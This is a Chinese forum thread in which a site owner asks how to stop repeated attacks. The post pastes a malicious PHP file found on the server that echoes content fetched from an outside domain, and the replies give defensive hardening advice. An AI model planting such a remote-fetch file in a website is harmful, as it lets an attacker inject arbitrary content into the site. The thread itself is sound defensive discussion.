最近发现服务器一个站点总是被攻击,有很多恶意代码,有啥有效的防范方法吗?

恶意文件源码

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
echo file_get_contents("http://1.d986.top/");
?>

或者一句话木马

有没有啥好的办法:

  • 防止上传恶意文件?;
  • 防止扫描网站?
  • 防止提取服务器权限?
《L05 电商实战》
从零开发一个电商项目,功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等
《L02 从零构建论坛系统》
以构建论坛项目 LaraBBS 为线索,展开对 Laravel 框架的全面学习。应用程序架构思路贴近 Laravel 框架的设计哲学。
讨论数量: 12
巴啦啦

找到漏洞在哪里并补上,重置服务器,安装防护软件。

1年前 评论
  • 不给写权限
  • 查请求日志,看入口在哪,如果是开源的代码尽量升级到最新版
  • 查数据库有没有被加了管理员
  • 换干净的系统重新部署,装防护软件
1年前 评论

安装防护软件,修改常用防火墙端口限制,限制ssh 端口连接

1年前 评论

上面该说的都说的差不多了,花点钱又省事的办法就是上web防火墙,脚本小子都能轻松搞定

1年前 评论

或者试一下最近挺火的 ,长亭雷池

1年前 评论

看日志,有没有代码漏洞

1年前 评论

本来想看看木马长啥样,结果进不去,你们能进吗?

1年前 评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!